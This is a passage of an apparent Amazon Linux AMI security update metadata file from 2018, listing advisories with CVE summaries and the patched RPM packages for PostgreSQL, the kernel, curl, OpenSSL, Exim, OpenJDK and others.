arch="i686"><filename>Packages/postgresql93-plperl-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.17-1.74.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-991</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-991: medium priority package update for nvidia</title><issued date="2018-04-05 17:01:00" /><updated date="2018-04-05 23:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-6253:
CVE-2018-6252:
CVE-2018-6251:
CVE-2018-6250:
CVE-2018-6249:
CVE-2018-6248:
CVE-2018-6247:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6247" title="" id="CVE-2018-6247" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6248" title="" id="CVE-2018-6248" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6249" title="" id="CVE-2018-6249" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6250" title="" id="CVE-2018-6250" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6251" title="" id="CVE-2018-6251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6252" title="" id="CVE-2018-6252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6253" title="" id="CVE-2018-6253" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nvidia-dkms" version="384.125" release="2017.09.109.amzn1" epoch="2" arch="x86_64"><filename>Packages/nvidia-dkms-384.125-2017.09.109.amzn1.x86_64.rpm</filename></package><package name="nvidia" version="384.125" release="2017.09.109.amzn1" epoch="2" arch="x86_64"><filename>Packages/nvidia-384.125-2017.09.109.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-993</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-993: medium priority package update for kernel</title><issued date="2018-04-19 04:44:00" /><updated date="2018-05-10 23:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5803:
An error in the &quot;_sctp_make_chunk()&quot; function (net/sctp/sm_make_chunk.c) when handling SCTP, packet length can be exploited by a malicious local user to cause a kernel crash and a DoS.
1551051:
CVE-2018-5803 kernel: Missing length check of payload in net/sctp/sm_make_chunk.c:_sctp_make_chunk() function allows denial of service
CVE-2018-1066:
A flaw was found in the Linux kernel&#039;s client-side implementation of the cifs protocol. This flaw allows an attacker controlling the server to kernel panic a client which has the CIFS server mounted.
1539599:
CVE-2018-1066 kernel: Null pointer dereference in fs/cifs/cifsencrypt.c:setup_ntlmv2_rsp() when empty TargetInfo is returned in NTLMSSP setup negotiation response allowing to crash client's kernel
CVE-2017-18232:
The Serial Attached SCSI (SAS) implementation in the Linux kernel mishandles a mutex within libsas. This allows local users to cause a denial of service (deadlock) by triggering certain error-handling code.
1558066:
CVE-2017-18232 kernel: Mishandling mutex within libsas allowing local Denial of Service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18232" title="" id="CVE-2017-18232" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1066" title="" id="CVE-2018-1066" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5803" title="" id="CVE-2018-5803" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.93" release="41.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.93-41.60.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.93" release="41.60.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.93-41.60.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.93" release="41.60.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.93-41.60.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-995</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-995: medium priority package update for curl</title><issued date="2018-04-19 04:56:00" /><updated date="2018-04-19 22:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000122:
A buffer over-read exists in curl 7.20.0 to and including curl 7.58.0 in the RTSP+RTP handling code that allows an attacker to cause a denial of service or information leakage
1553398:
CVE-2018-1000122 curl: RTSP RTP buffer over-read
CVE-2018-1000121:
A NULL pointer dereference flaw was found in the way libcurl checks values returned by the openldap ldap_get_attribute_ber() function. A malicious LDAP server could use this flaw to crash a libcurl client application via a specially crafted LDAP reply.
1552631:
CVE-2018-1000121 curl: LDAP NULL pointer dereference
CVE-2018-1000120:
It was found that libcurl did not safely parse FTP URLs when using the CURLOPT_FTP_FILEMETHOD method. An attacker, able to provide a specially crafted FTP URL to an application using libcurl, could write a NULL byte at an arbitrary location, resulting in a crash, or an unspecified behavior.
1552628:
CVE-2018-1000120 curl: FTP path trickery leads to NIL byte out of bounds write
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000120" title="" id="CVE-2018-1000120" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000121" title="" id="CVE-2018-1000121" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000122" title="" id="CVE-2018-1000122" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl-devel" version="7.53.1" release="16.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.53.1-16.84.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="16.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.53.1-16.84.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.53.1" release="16.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.53.1-16.84.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.53.1" release="16.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.53.1-16.84.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="16.84.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.53.1-16.84.amzn1.i686.rpm</filename></package><package name="curl" version="7.53.1" release="16.84.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.53.1-16.84.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.53.1" release="16.84.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.53.1-16.84.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="16.84.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.53.1-16.84.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-996</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-996: medium priority package update for stunnel amazon-efs-utils</title><issued date="2018-04-19 04:59:00" /><updated date="2018-04-20 00:18:00" /><severity>medium</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amazon-efs-utils" version="1.2" release="1.amzn1" epoch="0" arch="noarch"><filename>Packages/amazon-efs-utils-1.2-1.amzn1.noarch.rpm</filename></package><package name="stunnel-debuginfo" version="4.56" release="4.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/stunnel-debuginfo-4.56-4.13.amzn1.x86_64.rpm</filename></package><package name="stunnel" version="4.56" release="4.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/stunnel-4.56-4.13.amzn1.x86_64.rpm</filename></package><package name="stunnel" version="4.56" release="4.13.amzn1" epoch="0" arch="i686"><filename>Packages/stunnel-4.56-4.13.amzn1.i686.rpm</filename></package><package name="stunnel-debuginfo" version="4.56" release="4.13.amzn1" epoch="0" arch="i686"><filename>Packages/stunnel-debuginfo-4.56-4.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-997</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-997: medium priority package update for exim</title><issued date="2018-04-19 05:07:00" /><updated date="2018-04-19 22:37:00" /><severity>medium</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-mysql" version="4.90.1" release="3.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.90.1-3.15.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.90.1" release="3.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.90.1-3.15.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.90.1" release="3.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.90.1-3.15.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.90.1" release="3.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.90.1-3.15.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.90.1" release="3.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.90.1-3.15.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.90.1" release="3.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.90.1-3.15.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.90.1" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.90.1-3.15.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.90.1" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.90.1-3.15.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.90.1" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.90.1-3.15.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.90.1" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.90.1-3.15.amzn1.i686.rpm</filename></package><package name="exim" version="4.90.1" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.90.1-3.15.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.90.1" release="3.15.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.90.1-3.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1000</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1000: low priority package update for openssl</title><issued date="2018-04-19 17:38:00" /><updated date="2018-04-19 23:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-0737:
OpenSSL RSA key generation was found to be vulnerable to cache side-channel attacks. An attacker with sufficient access to mount cache timing attacks during the RSA key generation process could recover parts of the private key.
1568253:
CVE-2018-0737 openssl: RSA key generation cache timing vulnerability in crypto/rsa/rsa_gen.c allows attackers to recover private keys
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0737" title="" id="CVE-2018-0737" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-debuginfo" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-8.107.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-8.107.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-8.107.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-8.107.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-8.107.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-8.107.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-8.107.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-8.107.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-8.107.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="8.107.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-8.107.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1002</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1002: critical priority package update for java-1.8.0-openjdk</title><issued date="2018-04-26 16:44:00" /><updated date="2018-04-26 22:11:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2815:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567537:
CVE-2018-2815 OpenJDK: unbounded memory allocation during deserialization in StubIORImpl (Serialization, 8192757)
CVE-2018-2814:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1567121:
CVE-2018-2814 OpenJDK: incorrect handling of Reference clones can lead to sandbox bypass (Hotspot, 8192025)
CVE-2018-2800:
Vulnerability in the Java SE, JRockit component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u181, 7u171 and 8u162; JRockit: R28.3.17. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, JRockit accessible data as well as unauthorized read access to a subset of Java SE, JRockit accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N).
1568163:
CVE-2018-2800 OpenJDK: RMI HTTP transport enabled by default (RMI, 8193833)
CVE-2018-2799:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567542:
CVE-2018-2799 OpenJDK: unbounded memory allocation during deserialization in NamedNodeMapImpl (JAXP, 8189993)
CVE-2018-2798:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567543:
CVE-2018-2798 OpenJDK: unbounded memory allocation during deserialization in Container (AWT, 8189989)
CVE-2018-2797:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JMX). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567545:
CVE-2018-2797 OpenJDK: unbounded memory allocation during deserialization in TabularDataSupport (JMX, 8189985)
CVE-2018-2796:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are Java SE: 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567546:
CVE-2018-2796 OpenJDK: unbounded memory allocation during deserialization in PriorityBlockingQueue (Concurrency, 8189981)
CVE-2018-2795:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567351:
CVE-2018-2795 OpenJDK: insufficient consistency checks in deserialization of multiple classes (Security, 8189977)
CVE-2018-2794:
Vulnerability in the Java SE, JRockit component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162, 10 and JRockit: R28.3.17. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Java SE, JRockit executes to compromise Java SE, JRockit. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 7.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1567126:
CVE-2018-2794 OpenJDK: unrestricted deserialization of data from JCEKS key stores (Security, 8189997)
CVE-2018-2790:
